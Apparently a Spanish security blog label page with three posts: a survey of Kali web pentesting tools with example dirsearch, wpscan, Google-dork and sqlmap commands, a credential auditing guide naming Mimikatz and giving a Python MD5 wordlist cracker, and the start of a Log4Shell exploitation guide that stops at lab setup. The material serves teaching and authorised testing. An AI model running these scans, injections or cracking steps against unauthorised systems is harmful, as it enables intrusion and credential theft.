Showing posts with label Seguridad de Aplicaciones Web. Show all posts
Showing posts with label Seguridad de Aplicaciones Web. Show all posts

Las 6 Herramientas Esenciales para Pentesting Web Avanzado en Kali Linux

La red es un campo de batalla. Cada aplicación web, una fortaleza con más o menos defensas. Y en esta guerra digital, las herramientas no son meros complementos; son la extensión de tu voluntad, el bisturí del analista, el martillo del auditor. Hoy no vamos a hablar de fantasmas en la máquina, sino de los arquitectos de la detección: las herramientas que te permiten desmantelar, comprender y, sí, asegurar, las aplicaciones web. Olvida el ruido; vamos a los cimientos. En Kali Linux, la caja de herramientas del pentester está llena, pero hay un núcleo, un conjunto de utilidades que separan al aficionado del profesional. Aquí desglosamos las seis que marcan la diferencia.

Tabla de Contenidos

Introducción a la Autopsia Digital

El código que late en el corazón de una aplicación web es a menudo un ecosistema complejo. Identificar las tecnologías subyacentes es el primer paso crítico. No se trata solo de saber si es PHP o Node.js; es comprender las versiones, los frameworks, los CMS, los balances de carga, los CDNs. Toda esta información es inteligencia de campo. Y donde hay inteligencia, hay una vulnerabilidad esperando ser explotada o, mejor aún, una defensa que fortalecer.

En Kali Linux, estas herramientas no son solo scripts; son extensiones de tu capacidad analítica. Permiten auditar la superficie de ataque de manera eficiente, revelando tecnologías que, si no se parchean o configuran correctamente, se convierten en brechas de seguridad. Desde la detección de vulnerabilidades específicas de WordPress hasta la exploración de directorios ocultos, cada herramienta cumple una función vital en el arsenal del pentester.

Comprendiendo el Campo de Juego: Metodología

Antes de lanzar cualquier herramienta, la fase de reconocimiento es primordial. Esto se divide comúnmente en reconocimiento pasivo (sin interacción directa con el objetivo) y activo (interacción directa). Las herramientas que discutiremos hoy caen principalmente en la categoría de reconocimiento activo, pero su uso inteligente se basa en la inteligencia recopilada pasivamente. La clave es construir un mapa detallado de la aplicación web: qué tecnologías usa, qué funcionalidades expone y qué puntos de entrada podría tener un atacante.

"En la cadena de ataque y defensa, el conocimiento es la primera y más letal arma."

Wappalyzer: El Detective de Tecnologías

Imagina caminar por una ciudad y poder saber al instante la arquitectura de cada edificio, el material del que está hecho y su propósito. Eso es Wappalyzer para una aplicación web. Originalmente una extensión de navegador, now also available as a command-line interface (CLI) tool, Wappalyzer detecta frameworks, CMS, bibliotecas de JavaScript, servidores web y muchas otras tecnologías utilizadas por un sitio web. Su poder reside en su extensa base de datos de patrones de detección.

Uso Básico (CLI):

wappalyzer <URL_DEL_SITIO_WEB>

Esto te proporcionará una lista detallada de las tecnologías detectadas. Es una información invaluable para refinar tus ataques posteriores, centrándote en vulnerabilidades conocidas para esas tecnologías específicas.

WhatWeb: Rastreando la Huella Digital

Similar a Wappalyzer, WhatWeb es otra potente herramienta de reconocimiento pasivo y activo. Su fuerza radica en su flexibilidad y la cantidad de plugins disponibles que amplían su capacidad de detección. Puede identificar más de 1.800 sitios web, tecnologías de la información, sistemas de gestión de contenido (CMS), frameworks de JavaScript, protocolos de servidor y más.

Uso Básico:

whatweb <URL_DEL_SITIO_WEB>

La salida de WhatWeb es densa en información y a menudo más detallada que la de Wappalyzer en ciertos aspectos. Te da una visión clara de los "ingredientes" de la aplicación web, permitiéndote evaluar la superficie de ataque más rápidamente. Para un análisis profundo, usar ambas herramientas puede ser beneficioso.

Dirsearch: Descubriendo Puertas Traseras

Las aplicaciones web a menudo exponen directorios y archivos que no están intencionadamente visibles para el público general. Estos pueden ser puntos de entrada críticos para un atacante, conteniendo configuraciones, backups, directorios de administración o incluso código fuente sensible. Dirsearch es una herramienta de Python diseñada para escanear directorios y archivos en servidores web de manera rápida y eficiente.

Uso con Opciones Comunes:

dirsearch -u <URL_DEL_SITIO_WEB> -e php,html,js,bak,old -f -w /usr/share/dirb/wordlists/common.txt

Aquí, `-u` especifica la URL, `-e` define las extensiones a buscar, `-f` fuerza la búsqueda, y `-w` utiliza una lista de palabras (necesitarás instalar un diccionario como el de dirb o seclists). La clave con Dirsearch es usar diccionarios relevantes y considerar las extensiones comunes de ficheros y directorios de configuración.

Google Dorks: El Ojo Omnisciente

Google no es solo un motor de búsqueda; es una ventana al mundo digital, y para un pentester, un vasto repositorio de información sobre objetivos. Los "Google Dorks" son consultas de búsqueda avanzadas que utilizan operadores específicos para encontrar información que los motores de búsqueda normales ocultan. Permiten descubrir archivos específicos, directorios indexados, páginas de inicio de sesión, errores de configuración y mucho más.

Ejemplos de Dorks Útiles:

  • site:<dominio.com> filetype:pdf: Encuentra archivos PDF en un dominio específico.
  • site:<dominio.com> intitle:"index of": Busca directorios con indexación habilitada.
  • site:<dominio.com> inurl:admin: Localiza páginas de administración.
  • site:<dominio.com> ext:log: Busca archivos de log.

El uso creativo de Google Dorks puede revelar información embarazosa para la organización objetivo, desde credenciales expuestas hasta bases de datos desprotegidas. Requiere práctica y un entendimiento de cómo los sitios web y los servidores están configurados.

WPScan: El Especialista en WordPress

WordPress impulsa una porción masiva de la web. Si tu objetivo es una web basada en WordPress, WPScan es tu herramienta de elección. Es un escáner de vulnerabilidades específico para WordPress que detecta versiones del núcleo, plugins, temas y configuraciones inseguras. Su base de datos de vulnerabilidades es vasta y se actualiza constantemente.

Escaneo Básico:

wpscan --url https://<dominio.com> --enumerate p --plugins-detection aggressive

La opción `--enumerate p` intenta enumerar los plugins. `plugins-detection aggressive` intenta una detección más profunda. WPScan puede revelar versiones de plugins con vulnerabilidades conocidas, lo que te permite lanzar ataques específicos. Dominar WPScan es casi un requisito para cualquier pentester web que se enfrente a sitios de WordPress.

Burp Suite: El Centro de Mando del Pentester Web

Burp Suite es, sin duda, el estándar de oro para el pentesting de aplicaciones web. No es solo una herramienta, es un entorno de trabajo integral que combina un proxy interceptor, un escáner de vulnerabilidades, un repetidor para manipular peticiones, un intruso para ataques de fuerza bruta, y muchas otras utilidades. Su versión Community es potente, pero la versión Professional desbloquea capacidades esenciales para análisis serios.

Funcionamiento Fundamental:

  1. Proxy: Configuras tu navegador para usar Burp Suite como proxy. Todo el tráfico HTTP/S entre tu navegador y el servidor web pasa a través de Burp.
  2. Interceptación: Puedes interceptar y modificar peticiones y respuestas al vuelo.
  3. Scanner (Pro): Identifica automáticamente vulnerabilidades comunes como inyecciones SQL, XSS, CSRF, etc.
  4. Repeater: Te permite reenviar peticiones modificadas manualmente y analizar las respuestas, ideal para probar hipótesis de vulnerabilidad.
  5. Intruder: Para ataques automatizados de fuerza bruta a formularios, parámetros o cabeceras.

Dominar Burp Suite es una de las inversiones de tiempo más rentables en el campo del pentesting web. La capacidad de inspeccionar y manipular el tráfico te da un control granular sobre tus pruebas.

SQLMap: El Maestro de la Inyección

Las inyecciones SQL siguen siendo una de las vulnerabilidades más devastadoras y comunes en aplicaciones web. SQLMap es una herramienta de código abierto que automatiza el proceso de detección y explotación de inyecciones SQL. Puede extraer datos de bases de datos, acceder al sistema de archivos subyacente e incluso tomar el control del servidor en algunos casos.

Identificación y Explotación Básica:

sqlmap -u "http://ejemplo.com/pagina.php?id=1" --dbs --batch

Aquí, `-u` especifica la URL con un parámetro vulnerable (a menudo identificado previamente con Burp Suite o manualmente), `--dbs` solicita listar las bases de datos, y `--batch` responde automáticamente a las preguntas con opciones por defecto. SQLMap soporta una gran cantidad de tipos de inyección y bases de datos. Es una herramienta que debes entender a fondo para poder defenderte de ella.

Veredicto del Ingeniero: ¿Vale la Pena Dominar Estas Herramientas?

Absolutamente. Estas seis herramientas forman la columna vertebral del pentesting web moderno. Ignorarlas sería como un cirujano intentando operar sin sus instrumentos básicos. Cada una tiene un propósito específico, y su uso combinado te proporciona una visión holística y profunda de la seguridad de una aplicación web.

Pros:

  • Eficiencia Máxima: Automatizan tareas tediosas y repetitivas.
  • Cobertura Amplia: Cubren desde la identificación de tecnologías hasta la explotación de vulnerabilidades críticas.
  • Inteligencia Accionable: Proporcionan datos que permiten tomar decisiones estratégicas en el pentest.
  • Estándar de Industria: Son herramientas ampliamente reconocidas y utilizadas.

Contras:

  • Curva de Aprendizaje: Requieren tiempo y práctica para dominar todas sus funcionalidades. Un conocimiento superficial puede llevar a falsos positivos o negativos.
  • Dependencia Excesiva: Confiar ciegamente en ellas sin entender los principios subyacentes puede ser peligroso. Un atacante hábil puede evadir escaneos automatizados.
  • Coste (Burp Suite Pro): Si bien las versiones comunitarias son útiles, las capacidades avanzadas de Burp Suite Professional requieren una inversión financiera.

En resumen: son herramientas indispensables. Su valor no reside solo en su potencia intrínseca, sino en cómo el operador las integra en una metodología de pentesting robusta. Aprenderlas es un paso obligatorio para cualquiera que pretenda tomarse en serio la seguridad web.

Arsenal del Operador/Analista

  • Software Esencial: Burp Suite Professional, Kali Linux (o Parrot OS), Dirsearch, WhatWeb, WPScan, SQLMap, Nmap, Wireshark.
  • Herramientas Complementarias: Extensiones de navegador (Wappalyzer, FoxyProxy), Google Dorks, SecLists.
  • Libros Fundamentales: "The Web Application Hacker's Handbook" por Dafydd Stuttard & Marcus Pinto, "OWASP Testing Guide".
  • Certificaciones Relevantes: OSCP (Offensive Security Certified Professional), GWAPT (GIAC Web Application Penetration Tester).
  • Entornos de Práctica: OWASP Juice Shop, VulnHub, Hack The Box, TryHackMe.

Taller Práctico: Tu Primer Escaneo con Dirsearch

Vamos a simular un escenario básico para entender Dirsearch. Imagina que has identificado un objetivo y Wappalyzer te ha dicho que usa Apache y sirve archivos PHP.

  1. Instalación de Diccionarios: Asegúrate de tener un diccionario adecuado. Si utilizas Kali Linux, instálalo con: 
    sudo apt update && sudo apt install dirb -y
    Esto te dará acceso a `/usr/share/dirb/wordlists/common.txt`.
  2. Ejecución de Dirsearch: Abre tu terminal y ejecuta el siguiente comando, reemplazando la URL y ajustando las extensiones según sea necesario. Buscaremos extensiones comunes como `.php`, `.html`, `.js` y directorios de backup `.bak` o `.old`. 
    dirsearch -u http://ejemplo.com -e php,html,js,bak,old -f -w /usr/share/dirb/wordlists/common.txt
    • `-u http://ejemplo.com`: La URL del objetivo.
    • `-e php,html,js,bak,old`: Extensiones a buscar.
    • `-f`: Fuerza la ejecución incluso si detecta redirecciones.
    • `-w /usr/share/dirb/wordlists/common.txt`: Especifica el archivo de diccionario.
  3. Análisis de Resultados: Dirsearch listará los directorios y archivos encontrados, indicando su código de estado HTTP (200 OK, 404 Not Found, 403 Forbidden, etc.). Presta especial atención a los códigos 200 y 403, ya que pueden revelar recursos accesibles o protegidos incorrectamente.
  4. Próximos Pasos: Si encuentras un directorio como `/admin` o un archivo como `config.bak`, deberías intentar acceder a ellos directamente en tu navegador o usar Burp Suite para investigar más a fondo.

Este ejercicio, aunque simple, te enseña la importancia de la enumeración y cómo una herramienta puede revelar activos ocultos que, de otro modo, pasarían desapercibidos.

Preguntas Frecuentes

¿Son estas herramientas legales de usar?

El uso de estas herramientas es legal siempre y cuando las utilices en sistemas para los que tengas permiso explícito para probar su seguridad (pentesting ético). Utilizarlas contra sistemas sin autorización es ilegal y puede tener graves consecuencias.

¿Todas estas herramientas vienen preinstaladas en Kali Linux?

La mayoría de ellas sí, como Burp Suite Community, WPScan, SQLMap y WhatWeb. Dirsearch puede requerir una instalación manual de Python y la descarga de diccionarios. Wappalyzer, en su forma CLI, también puede necesitar instalación.

¿Qué herramienta debo aprender primero?

Para pentesting web, Burp Suite es fundamental. Después de entender cómo funciona el tráfico HTTP/S, puedes pasar a herramientas de enumeración como Dirsearch o WhatWeb, y luego a herramientas específicas como WPScan o SQLMap.

¿Qué hago si encuentro una vulnerabilidad?

Documenta tu hallazgo detalladamente, incluyendo los pasos para reproducirlo (Proof of Concept - PoC), el impacto potencial y las recomendaciones de mitigación. Si estás realizando pentesting profesional, sigue el protocolo de notificación establecido con el cliente. En programas de bug bounty, sigue sus directrices específicas.

¿Es suficiente usar solo estas herramientas?

No. Estas herramientas son potentes, pero el verdadero valor de un pentester reside en su capacidad de pensamiento crítico, creatividad y comprensión de los principios de seguridad. Las herramientas te ayudan a ser eficiente, pero la metodología y la intuición son lo que te permite encontrar vulnerabilidades más complejas y únicas.

El Contrato: Asegura el Perímetro con Inteligencia

La red es un laberinto en constante cambio. Las herramientas que hemos diseccionado hoy son tus guías, tus mapas y, a veces, tus ganzúas en este intrincado territorio. Cada fragmento de información que obtienes, ya sea la versión de un framework o la existencia de un directorio olvidado, es un activo. Un activo que fortalece tu defensa o abre una puerta para el adversario.

Tu contrato es simple: utiliza esta inteligencia con propósito. No te limites a escanear; comprende. No te limites a obtener datos; analízalos. Pregúntate siempre: ¿Qué más hay escondido? ¿Qué puerta no he intentado abrir todavía? La verdadera victoria no está en encontrar 100 vulnerabilidades de bajo impacto, sino en una sola brecha crítica que podría derribar un sistema. Busca profundidad, no solo amplitud.

Ahora es tu turno. ¿Cómo integras tú estas herramientas en tu flujo de trabajo de pentesting? ¿Hay alguna otra herramienta esencial que consideres crítica y que no hayamos mencionado? Comparte tus hallazgos y tu metodología en los comentarios. Demuestra que entiendes el contrato.

at No comments:
Labels: , , , , , , , , ,

Guía Definitiva para la Recuperación Segura de Credenciales y Auditoría de Cuentas

La red es un campo de batalla. Las credenciales son el botín más codiciado, la llave maestra que abre no solo puertas, sino sistemas enteros. Pero el camino para asegurar o auditar estas llaves no es una autopista directa; es un laberinto de protocolos obsoletos, ingeniería social y vulnerabilidades que esperan ser descubiertas. Hoy no vamos a hablar de atajos ilegítimos, sino de la ingeniería detrás de la recuperación y auditoría responsable de credenciales.

En el submundo digital, existen herramientas que prometen el acceso fácil a cuentas ajenas. No caigas en esa trampa. Lo que disfrazan como "ataques" directos a contraseñas son a menudo simplemente intentos de phishing o descargas de malware. La seguridad real y la auditoría de cuentas se basan en el conocimiento técnico, la metodología y las herramientas apropiadas. Aquí, desmantelaremos la idea de "obtener la contraseña de cualquiera" para enfocarnos en cómo un operador de seguridad, un pentester o un analista de datos forenses abordaría la recuperación y auditoría de credenciales de forma ética y efectiva.

Este análisis se centrará en los principios subyacentes, las técnicas de investigación y las herramientas que un profesional utiliza para comprender cómo se gestionan las credenciales, dónde residen las vulnerabilidades y cómo realizar auditorías de seguridad rigurosas. Olvida las promesas de magia; aquí, hablamos de ingeniería.

Tabla de Contenidos

1. Introducción Técnica: El Paisaje de las Credenciales

Las credenciales, compuestas típicamente por un nombre de usuario (o correo electrónico) y una contraseña, son la puerta de entrada a nuestro mundo digital. En la superficie, parecen simples. Bajo el capó, su gestión y seguridad se encuentran entre los desafíos más persistentes en ciberseguridad. Desde sistemas legados que aún confían en métodos de autenticación débiles hasta la proliferación de servicios en la nube, el vector de ataque más común sigue siendo el acceso no autorizado a estas credenciales.

La industria ha transitado desde contraseñas de texto plano (un error craso que ya ni se discute) a hashes salados, y ahora a protocolos de autenticación multifactor (MFA). Sin embargo, la debilidad humana persiste. La ingeniería social, la reutilización desmedida de contraseñas y la falta de concienciación son las grietas por donde se cuelan los atacantes. Comprender este paisaje es el primer paso para cualquier operador de seguridad.

2. Ingeniería Social y Phishing: El Primer Vector de Ataque

Antes de pensar en explotar una vulnerabilidad técnica en un servidor, un atacante inteligente considerará la ruta de menor resistencia: el factor humano. La ingeniería social manipula psicológicamente a las personas para que realicen acciones o divulguen información confidencial. El phishing es su manifestación más común, disfrazando comunicaciones maliciosas como si provinieran de fuentes legítimas para engañar a los usuarios y que revelen sus credenciales.

Las campañas de phishing modernas son sofisticadas. Pueden imitar correos electrónicos de servicios financieros, plataformas de streaming, redes sociales o incluso sistemas internos de empresas. Los enlaces maliciosos llevan a páginas de inicio de sesión falsas, diseñadas para capturar los datos de entrada del usuario. La efectividad de estas tácticas subraya la importancia de la formación en seguridad para los usuarios finales y la necesidad de herramientas que detecten y bloqueen tales intentos.

"La ciberseguridad no es solo tecnología; es también la psicología de la confianza y la explotación de la confianza."

Desde la perspectiva de un operador de seguridad, entender cómo funcionan estos ataques es crucial para implementar defensas. Esto incluye el análisis de encabezados de correo electrónico, la detección de dominios de phishing y la concienciación constante sobre las tácticas de ingeniería social. Las herramientas de análisis de correo electrónico y los sistemas de prevención de intrusiones (IPS) juegan un papel aquí, pero la vigilancia humana sigue siendo insustituible.

3. Recuperación Forense de Credenciales: Autopsia Digital

Cuando hablamos de "recuperación forense" de credenciales, nos referimos a la extracción de información sensible de sistemas comprometidos o de datos de usuario con fines de investigación, no de acceso no autorizado. Esto puede ocurrir en el contexto de una investigación de brecha de datos, recuperación de acceso a una cuenta propia olvidada o análisis de sistemas infectados por malware.

Las credenciales pueden residir en múltiples ubicaciones:

  • Archivos de Configuración: A menudo, las aplicaciones guardan credenciales de bases de datos u otros servicios en archivos de configuración. Si no están debidamente protegidos o encriptados, pueden ser leídos directamente.
  • Bases de Datos: Las contraseñas de usuarios de aplicaciones suelen almacenarse en bases de datos. La recuperación aquí implica acceder a la base de datos y, si están almacenadas como texto plano o con hashes débiles (como MD5 sin salting), extraerlas.
  • Memoria RAM: Herramientas forenses avanzadas pueden volcar la memoria RAM de un sistema en ejecución para buscar credenciales que se encuentran temporalmente allí mientras un proceso las está utilizando.
  • Archivos de Caché y Cookies del Navegador: Los navegadores web almacenan credenciales en archivos de caché y cookies para facilitar el acceso. Estos son objetivos comunes en análisis forenses de estaciones de trabajo.
  • Credenciales Almacenadas en Sistemas Operativos: Windows, por ejemplo, tiene el Credential Manager, y sistemas Linux pueden tener información en archivos `.ssh` o configuraciones de servicios.

La recuperación forense exige un conocimiento profundo de los sistemas de archivos, estructuras de datos y las técnicas utilizadas por el malware o los atacantes para exfiltrar información. Se utilizan herramientas especializadas como Mimikatz (en entornos Windows, con fines de auditoría y análisis de seguridad), Volatility Framework para análisis de memoria, y scripts personalizados para parsear archivos de configuración o bases de datos.

"Cada bit de información es un testigo silencioso. El forense digital es el traductor."

4. Auditoría de Cuentas: Fortaleciendo el Perímetro

La auditoría de cuentas es un proceso proactivo y continuo destinado a asegurar que las credenciales se gestionan de forma segura y que solo los usuarios autorizados tienen acceso a los recursos necesarios. No es una acción única, sino parte integral de un programa de seguridad robusto.

Los puntos clave de una auditoría de cuentas incluyen:

  • Políticas de Contraseñas Robustas: Verificar que las políticas exijan contraseñas complejas (longitud, variedad de caracteres) y caducidad periódica. La prohibición de contraseñas comunes o hashing de contraseñas con algoritmos modernos y salting es fundamental.
  • Gestión de Privilegios: Asegurar que los usuarios tengan el mínimo privilegio necesario para realizar sus tareas (Principio de Menor Privilegio). La revisión periódica de roles y permisos es vital.
  • Autenticación Multifactor (MFA): Implementar y verificar el uso de MFA siempre que sea posible, especialmente para accesos remotos y a sistemas críticos.
  • Detección de Cuentas Inactivas o Huérfanas: Identificar y deshabilitar cuentas que ya no están en uso para reducir la superficie de ataque.
  • Monitoreo de Actividad de Cuentas: Revisar logs de acceso para detectar patrones anómalos, intentos fallidos de inicio de sesión repetidos o accesos desde ubicaciones geográficas inusuales.

Las herramientas de gestión de identidades y accesos (IAM), así como las soluciones de Security Information and Event Management (SIEM), son esenciales para automatizar gran parte de este proceso. Un analista de seguridad utilizará estas herramientas para correlacionar eventos, generar alertas y generar informes de cumplimiento.

5. Arsenal del Operador/Analista

Para abordar tareas de recuperación forense y auditoría de cuentas, un operador o analista requiere un conjunto de herramientas bien definido. La elección depende del sistema operativo, el tipo de datos y el objetivo específico de la auditoría o recuperación.

  • Herramientas de Pentesting y Auditoría:
    • Burp Suite Professional: Indispensable para la auditoría de aplicaciones web. Permite interceptar, modificar y analizar tráfico HTTP/S, facilitando la detección de vulnerabilidades relacionadas con la gestión de sesiones y la autenticación. La versión Pro es una inversión clave si te tomas en serio el pentesting web.
    • Nmap: Escáner de red para descubrir hosts y servicios activos, crucial para mapear el perímetro antes de cualquier auditoría.
    • Metasploit Framework: Aunque más orientado a la explotación, sus módulos pueden ser útiles para la auditoría de vulnerabilidades conocidas en servicios de autenticación.
    • Mimikatz: Herramienta de código abierto para sistemas Windows que permite extraer credenciales de la memoria (contraseñas en texto claro, hashes, PINs, etc.). Su uso debe ser estrictamente en entornos controlados para fines de auditoría.
  • Herramientas Forenses:
    • Volatility Framework: Análisis avanzado de volcados de memoria RAM. Ideal para encontrar procesos sospechosos, artefactos maliciosos y, sí, credenciales en memoria.
    • Autopsy / Sleuth Kit: Suite de herramientas forenses digitales para análisis de discos duros y sistemas de archivos. Permitirá recuperar archivos borrados y examinar el estado del sistema.
    • Wireshark: Analizador de protocolos de red. Esencial para inspeccionar tráfico de red en busca de credenciales transmitidas sin cifrar (un error grave del pasado, pero que aún se ve).
  • Herramientas de Programación y Scripting:
    • Python: Con librerías como Requests, BeautifulSoup y módulos para interactuar con bases de datos, es fundamental para automatizar la recolección y análisis de datos.
    • Jupyter Notebook: Entorno interactivo para escribir y ejecutar código Python, ideal para el análisis de datos y la creación de flujos de trabajo de auditoría documentados.
  • Libros Clave:
    • "The Web Application Hacker's Handbook: Finding Vulnerabilities with Burp Suite"
    • "Applied Network Security Monitoring: Collection, Detection, and Analysis"
    • "Digital Forensics and Incident Response"

La mayoría de estas herramientas tienen versiones gratuitas o de código abierto, pero para operaciones serias, la inversión en versiones profesionales (como Burp Suite Pro) es casi obligatoria. Comprender el precio y las características avanzadas de estas herramientas es parte de la estrategia de escalada.

6. Veredicto del Ingeniero: ¿Ética vs. Eficiencia?

El concepto de "obtener credenciales de cualquier persona" es una fantasía promovida por la desinformación y las herramientas maliciosas. La realidad de la recuperación de credenciales y la auditoría de cuentas es un campo técnico que requiere metodología, conocimiento y, sobre todo, una estricta adhesión a la ética.

Pros de un Enfoque Ético y Técnico:

  • Acceso Legítimo: Permite recuperar el acceso a TUS propias cuentas o a sistemas que tienes autorización explícita para auditar.
  • Fortalecimiento de Defensas: Las técnicas de auditoría y análisis forense informan directamente sobre cómo mejorar la seguridad y prevenir futuras brechas.
  • Cumplimiento Normativo: Muchas industrias y jurisdicciones exigen auditorías de seguridad regulares.
  • Desarrollo Profesional: Dominar estas técnicas te convierte en un profesional de ciberseguridad valioso.

Contras de los Métodos Ilegítimos (y por qué son un Error Fatal):

  • Consecuencias Legales Severas: Acceder a cuentas sin autorización es un delito grave con penas de cárcel y multas cuantiosas.
  • Daño a la Reputación: Ser asociado con actividades maliciosas destruirá tu carrera profesional.
  • Ineficacia a Largo Plazo: Las tácticas de "ataque rápido y fácil" suelen ser detectadas y bloqueadas, o requieren exploits que se vuelven obsoletos rápidamente.
  • Falta de Conocimiento Profundo: No aportan un entendimiento real de la seguridad, solo perpetúan un ciclo de ineficacia.

En resumen: No existe atajo ético para obtener credenciales ajenas. La vía correcta es el conocimiento técnico aplicado a la auditoría y la recuperación legítima. Las herramientas "mágicas" son un mito peligroso.

7. Taller Práctico: Animar un Script de Auditoría Básica

Este taller demostrará cómo un script básico en Python puede ayudar a auditar contraseñas comunes en un entorno controlado. **NUNCA USES ESTO EN REDES O SISTEMAS QUE NO TE PERTENEZCAN O PARA LOS CUALES NO TENGAS AUTORIZACIÓN EXPLÍCITA.** Este ejercicio es puramente educativo y simula una auditoría de fuerza bruta sobre un archivo de contraseñas.

Objetivo: Dado un archivo de contraseñas comunes (un wordlist), intentar descifrar hashes de contraseñas (MD5 en este ejemplo, un algoritmo obsoleto para demostración).

  1. Preparación:
    • Crea un archivo llamado passwords.txt con una lista de contraseñas comunes, una por línea (ej: "123456", "password", "qwerty", "admin123").
    • Crea un archivo llamado hashes.txt. En este archivo, coloca los hashes MD5 de algunas de las contraseñas de passwords.txt. Puedes generar hashes MD5 usando herramientas en línea o scripts de Python. Por ejemplo, el hash MD5 de "password" es 5f4dcc3b5aa465fde70e458d0e504160.
  2. Crea el Script Python: Pega el siguiente código en un archivo llamado hash_cracker.py. 
    
import hashlib
import sys

def crack_md5(hash_to_crack, wordlist_path):
    try:
        with open(wordlist_path, 'r') as wordlist_file:
            for line in wordlist_file:
                password = line.strip()
                hashed_password = hashlib.md5(password.encode('utf-8')).hexdigest()
                if hashed_password == hash_to_crack:
                    print(f"¡Contraseña encontrada! Hash: {hash_to_crack}, Contraseña: {password}")
                    return password
    except FileNotFoundError:
        print(f"Error: El archivo de lista de contraseñas no se encontró en {wordlist_path}")
        sys.exit(1)
    except Exception as e:
        print(f"Ocurrió un error inesperado: {e}")
        sys.exit(1)

    print(f"Contraseña no encontrada para el hash: {hash_to_crack}")
    return None

if __name__ == "__main__":
    if len(sys.argv) != 3:
        print("Uso: python hash_cracker.py  ")
        sys.exit(1)

    target_hash = sys.argv[1]
    wordlist = sys.argv[2]

    print(f"Iniciando crackeo contra el hash: {target_hash} usando la lista: {wordlist}")
    crack_md5(target_hash, wordlist)
  3. Ejecuta el Script: Abre tu terminal y ejecuta el script. Reemplaza <hash_md5> por un hash de tu archivo hashes.txt y <ruta_a_la_lista_de_contraseñas> por la ruta a tu archivo passwords.txt. 
    
python hash_cracker.py 5f4dcc3b5aa465fde70e458d0e504160 passwords.txt

Notas: Este script es una demostración muy básica. Las auditorías reales emplean listas de palabras mucho más extensas, técnicas de fuerza bruta más sofisticadas y herramientas optimizadas para la velocidad. Además, los hashes modernos (como Argon2, bcrypt) son computacionalmente mucho más intensivos y resistentes a este tipo de ataques directos, requiriendo hardware especializado para su "crackeo" (que sigue siendo una práctica muy delicada y a menudo controvertida en términos de legalidad y ética).

8. Preguntas Frecuentes (FAQ)

¿Es ético intentar recuperar la contraseña de alguien?

No, a menos que tengas autorización explícita y un propósito legítimo, como una auditoría de seguridad en un sistema que posees o administras, o para recuperar el acceso a tu propia cuenta. Intentar acceder a las cuentas de otros sin permiso es ilegal y poco ético.

¿Qué debo hacer si olvido mi contraseña de Facebook (u otra cuenta)?

La mayoría de los servicios en línea ofrecen un proceso de recuperación de contraseña a través del correo electrónico registrado o número de teléfono asociado. Sigue los pasos indicados en la página de inicio de sesión ("¿Olvidaste tu contraseña?"). Si no tienes acceso a esos métodos, contacta directamente al soporte técnico del servicio.

¿Qué herramientas se usan para auditorías de seguridad de credenciales en empresas?

Las empresas suelen usar soluciones IAM (Identity and Access Management), herramientas SIEM (Security Information and Event Management) para monitoreo de logs, escáneres de vulnerabilidades, y herramientas de pentesting como Burp Suite para auditorías de aplicaciones web. Para análisis forenses de sistemas comprometidos, se utilizan suites como Volatility y Autopsy.

¿Por qué no se deben usar contraseñas MD5?

MD5 es un algoritmo de hash criptográfico obsoleto que es muy susceptible a colisiones y ataques de fuerza bruta. No tiene "sales" (un valor aleatorio único añadido a la contraseña antes de hashearla), lo que facilita el uso de tablas de arcoíris y la adivinación de contraseñas. Algoritmos modernos como bcrypt, scrypt o Argon2 son preferibles por su resistencia a ataques de fuerza bruta.

9. El Contrato: Resiliencia Digital

El salvaje oeste digital está lleno de promesas vacías y atajos peligrosos. El verdadero poder reside en el conocimiento técnico, la metodología rigurosa y un compromiso inquebrantable con la ética. Recuperar credenciales sin autorización es un camino directo al fracaso y a la ilegalidad. La auditoría de cuentas y la recuperación forense legítima son las herramientas que un operador de seguridad utiliza para observar, aprender y proteger.

Tu contrato es claro: domina las técnicas, respeta la ley y protege los sistemas. Utiliza las herramientas de forma responsable. Si caes en la tentación del acceso fácil, te conviertes en parte del problema, no de la solución.

Tu Desafío: Escáner de Credenciales en un Servicio Web

Imagina que has sido contratado para auditar la seguridad de un pequeño portal web que permite a los usuarios registrarse y subir documentos. Tu tarea es simular un intento **controlado y autorizado** de encontrar credenciales débiles. ¿Qué pasos seguirías? ¿Qué herramientas usarías para:

  1. Identificar posibles puntos de inyección o vulnerabilidades en el formulario de login/registro?
  2. Analizar el tráfico de red para ver cómo se transmiten las credenciales (si es que lo hacen de forma insegura)?
  3. Intentar recuperar credenciales de ejemplo que tú mismo hayas configurado en una base de datos de prueba (por ejemplo, usando hashes débiles)?

Documenta tus hallazgos, tus técnicas y tus conclusiones, siempre dentro de un entorno de laboratorio controlado. La seguridad se construye sobre el conocimiento, no sobre la imprudencia.

at No comments:
Labels: , , , , , ,

Guía Definitiva para Explotar la Vulnerabilidad Log4Shell (CVE-2021-44228)

La red está llena de fantasmas, susurros de código vulnerable que acechan en los sistemas. Uno de los más notorios, un espectro que paralizó industrias enteras, fue Log4Shell. Descubierta a finales de 2021, esta vulnerabilidad en la popular librería de logging de Java, Log4j, abrió las puertas a la ejecución remota de código (RCE) a una escala aterradora. No estamos aquí para llorar sobre el código caído, sino para diseccionar el ataque, entender su mecanismo y, lo más importante, aprender a defenderse desmantelando la amenaza de raíz. Hoy, en Sectemple, realizamos una autopsia digital de Log4Shell.

Tabla de Contenidos

Introducción: El Espectro Log4Shell

En el sombrío panorama de la ciberseguridad, ciertas vulnerabilidades dejan cicatrices imborrables. Log4Shell (CVE-2021-44228) es una de ellas. Su simplicidad de explotación y su ubicuidad en aplicaciones Java la convirtieron en una pesadilla para administradores y un festín para los atacantes. Esta falla crítica reside en la forma en que Log4j maneja las "búsquedas" dentro de sus mensajes de log. Si un atacante puede controlar parte de un mensaje de log, puede instruir a Log4j para que busque una referencia externa a través de Java Naming and Directory Interface (JNDI). El problema surge cuando esta búsqueda apunta a un servidor malicioso que responde con código ejecutable, otorgando al atacante control total sobre el servidor comprometido.

Tu código se ejecuta en un mundo donde la cadena de suministro de software es tan frágil como un castillo de naipes. Un solo componente vulnerable, como Log4j, puede ser la grieta por donde se filtre toda tu infraestructura. No subestimes el poder de un buen sistema de logging... ni su potencial para ser el talón de Aquiles de tu arquitectura.

Entorno de Prueba: El Laboratorio Controlado

Para desentrañar este misterio, necesitamos un campo de pruebas. La ética dicta que estas artes se practiquen en un entorno aislado. Aquí, utilizaremos dos escenarios: una máquina virtual de TryHackMe específicamente diseñada para practicar Log4Shell, y un contenedor Docker que levantaremos localmente para tener un control absoluto. Asegúrate de que tu entorno de red esté configurado correctamente, preferiblemente en un modo "host-only" o con reglas de firewall estrictas para evitar fugas.

Requisitos previos:

  • Java Development Kit (JDK) 8 o superior instalado.
  • Docker instalado y funcionando.
  • Una distribución Linux (Kali, Ubuntu, etc.) para el atacante.
